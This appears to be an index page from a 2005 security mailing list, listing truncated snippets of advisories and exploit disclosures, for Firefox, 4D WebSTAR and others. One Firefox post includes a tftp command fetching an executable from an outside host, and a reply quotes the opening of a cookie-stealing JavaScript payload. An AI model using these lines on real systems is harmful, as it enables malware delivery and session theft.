Re: Can't trust COMODO - An Update
2005-05-09, Gunter Ollmann (gunter ngssoftware com)
Hi List, An Update on progress with Comodo. Firstly thanks to all of you who emailed directly with advice and disbelief on the way Comodo plagiarised/copied my work. I could only reply to a few of you at the time because the volume of replies was amazing (it would appear that many of you were [...]

[SECURITY] [DSA 722-1] New smail packages fix arbitrary code execution
2005-05-09, joey infodrom org (Martin Schulze)

Firefox Remote Compromise Technical Details
2005-05-08, Paul (paul greyhats cjb net)
Firefox Remote Compromise Technical Details
Before I start, I need to say that this thing has been patched on Mozilla's server. If you take a look at any of the extension install pages on their site, you will see that the install function has a bunch of random letters and numbers after it. Even t [...]

Re: firefox 1.0.3 spoof+auto dl
2005-05-08, Paul (paul greyhats cjb net)
In-Reply-To: <20050507173037.20610.qmail (at) www.securityfocus (dot) com>
This is the copy of my PoC. The person responsible for the leak of my remote compromise is the starter of this thread. In fact, he copies some of the code directly from my PoC: javascript:'<noscript>'+eval('if (window.name!=\'stealcoo [...]

Firefox Remote Compromise Leaked
2005-05-08, Paul (paul greyhats cjb net)
Well, apparently one of my Firefox vulnerabilities has been leaked. Mikx and I have been working on Firefox security for some time and we are trying to put together something spectacular, but unfortunately there are always those people out there that feel they need to ruin it for people. About a we [...]

[ GLSA 200505-04 ] GnuTLS: Denial of Service vulnerability
2005-05-09, Matthias Geerdsen (vorlon gentoo org)

Re: MegaBook V2.0 - Cross Site Scripting Exploit
2005-05-08, Spy Hat (spyhat spyhat com)
In-Reply-To: <20050505104551.23441.qmail (at) www.securityfocus (dot) com>
The same vulnerability also exists in the new version of MegaBook V2.1
>Received: (qmail 6270 invoked from network); 5 May 2005 17:31:03 -0000
>Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) (205.206.231.2 [...]

firefox 1.0.3 spoof+auto dl
2005-05-07, john smith (edward11 postmaster co uk)
firefox 1.0.3 spoof+auto dl
./0 bite the cheese illwill./ idiot
tftp -i illmob.zapto.org get test.exe c:\test.exe
./-----------------js.js----------./
var blockedReferrer = 'blockedReferrer'; NS_ActualWrite=document.write; // Popup Blocker --> RanPostamble=0; NS_ActualOpen=window.open; functi [...]

4d WebSTAR 5.x Web Server Mac OS X Buffer Overflow
2005-05-06, Braden Thomas (bjthomas usc edu)
4d WebSTAR 5.x Mac OS X Buffer Overflow
Author: Braden Thomas
Vendor: http://www.4d.com
Product: 4d WebSTAR 5.33 and 5.4 Web Server on Mac OS X *only trial version tested
Risk: Medium, remote root (unlikely), DoS (likely)
PoC Exploit code included
Description: 4d WebSTAR 5.x (5.33 and 5.4 tes [...]

[ GLSA 200505-03 ] Ethereal: Numerous vulnerabilities
2005-05-06, Sune Kloppenborg Jeppesen (jaervosz gentoo org)

[USN-123-1] Xine library vulnerabilities
2005-05-06, Martin Pitt (martin pitt canonical com)
Ubuntu Security Notice USN-123-1, May 06, 2005
xine-lib vulnerabilities
CAN-2005-1195
A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ub [...]

[USN-120-1] Apache 2 vulnerability
2005-05-06, Martin Pitt (martin pitt canonical com)
Ubuntu Security Notice USN-120-1, May 06, 2005
apache2 vulnerability
CAN-2005-1344
A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ubunt [...]

[USN-121-1] OpenOffice.org vulnerability
2005-05-06, Martin Pitt (martin pitt canonical com)
Ubuntu Security Notice USN-121-1, May 06, 2005
openoffice.org vulnerability
CAN-2005-0941
A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) [...]

[USN-122-1] Squid vulnerability
2005-05-06, Martin Pitt (martin pitt canonical com)
Ubuntu Security Notice USN-122-1, May 06, 2005
squid vulnerability
CAN-2005-1345
A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ubuntu [...]

[USN-119-1] tcpdump vulnerabilities
2005-05-06, Martin Pitt (martin pitt canonical com)
Ubuntu Security Notice USN-119-1, May 06, 2005
tcpdump vulnerabilities
CAN-2005-1278, CAN-2005-1279, CAN-2005-1280
A security issue affects the following Ubuntu releases: U [...]

[SECURITY] [DSA 721-1] New squid packages fix ACL bypass
2005-05-06, joey infodrom org (Martin Schulze)

PHP Advanced Transfer Manager v1.21
2005-05-06, tjomi4 gmail com
Network security team, nst.void.ru [...]

FreeBSD Security Advisory FreeBSD-SA-05:08.kmem
2005-05-06, FreeBSD Security Advisories (security-advisories freebsd org)

FreeBSD Security Advisory FreeBSD-SA-05:07.ldt
2005-05-06, FreeBSD Security Advisories (security-advisories freebsd org)

FreeBSD Security Advisory FreeBSD-SA-05:06.iir
2005-05-06, FreeBSD Security Advisories (security-advisories freebsd org)

MDKSA-2005:081 - Updated XFree86/XOrg packages fix libXpm vulnerabilities
2005-05-06, Mandriva Security Team (security mandriva com)

Multiple Vulnerabilities In Invision Power Board
2005-05-06, GulfTech Security Research (security gulftech org)

Re: MegaBook V2.0 - Cross Site Scripting Exploit
2005-05-06, Morning Wood (wood exploitlabs com)
In-Reply-To: <20050505104551.23441.qmail (at) www.securityfocus (dot) com>
umm.. http://exploitlabs.com/files/advisories/EXPL-A-2003-011-megabook-2.0.txt
>Subject: MegaBook V2.0 - Cross Site Scripting Exploit
>
>The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, [...]

MDKSA-2005:082 - Updated OpenOffice.org packages fix heap overflow vulnerability
2005-05-06, Mandriva Security Team (security mandriva com)

Mac OS 10.4: new-account-wizzard in Mail 2.0 sends clear-text passwords
2005-05-04, Markus Wörle (mrks mrks de)
Hello there! I reported this bug at 01-May-2005 09:21 PM CEST to Apple's bug-reporting facility (Problem ID: 4104391) without reply yet.
Summary: At its first use, Mail.app 2.0 will launch a new-account-wizard that leads through the account-creation process. This wizard asks for a name, a l [...]
Abstract: Three attacks that apply to certain configurations of IPsec have been identified. These configurations use Encapsulating Security Payload (ESP) in tunnel mode with confidentiality only, or with integrity protection being provided by a higher layer protocol. Some configurations using AH t